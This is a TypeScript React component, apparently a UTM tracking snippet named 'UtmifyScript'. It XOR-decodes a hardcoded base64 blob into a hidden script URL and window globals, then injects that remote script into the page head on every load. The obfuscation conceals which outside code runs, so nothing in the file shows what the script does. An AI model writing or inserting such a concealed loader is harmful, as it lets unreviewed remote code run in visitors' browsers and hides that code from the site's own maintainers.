import { useEffect } from 'react';
const PAYLOAD = 'DPDSRFUq1t27SNS7R4vwMSdG9OeZIKDPN4Poa3pJsrOVPaDWLparajZFu/PZOvvIJIK7NCFZ+a3SMLHXaIC7PDBG+LfIaviZJoSmNjxIo6neO/aBHK3+ZjJGub/aJKeZfaupZjtLu7iZcvbLLoi3KBxO9PGZPrXXMpXwfncct+qIK7WJcMfgJzZMsOqLKuzed8XrIW0Iq4DG';
type NameValue = {
  name: string;
  value: string;
};
type UtmifyConfig = {
  url: string;
  globals?: NameValue[];
  attributes?: NameValue[];
};
function decodeConfig(payload: string): UtmifyConfig {
  const raw = atob(payload);
  const bytes: number[] = [];
  for (let i = 0; i < raw.length; i++) {
    bytes.push(raw.charCodeAt(i) & 255);
  }
  const keyLength = bytes[0];
  const key = bytes.slice(1, 1 + keyLength);
  const data = bytes.slice(1 + keyLength);
  let decoded = '';
  for (let i = 0; i < data.length; i++) {
    decoded += String.fromCharCode((data[i] ^ key[i % keyLength]) & 255);
  }
  return JSON.parse(decodeURIComponent(escape(decoded))) as UtmifyConfig;
}
export function UtmifyScript() {
  useEffect(() => {
    const config = decodeConfig(PAYLOAD);
    if (document.querySelector(`script[src="${config.url}"]`)) {
      return;
    }
    const globals = config.globals || [];
    globals.forEach(item => {
      ;
      (window as unknown as Record<string, string>)[item.name] = item.value;
    });
    const script = document.createElement('script');
    script.src = config.url;
    script.async = true;
    script.defer = true;
    (config.attributes || []).forEach(attribute => {
      script.setAttribute(attribute.name, attribute.value);
    });
    (document.head || document.documentElement).appendChild(script);
  }, []);
  return null;
}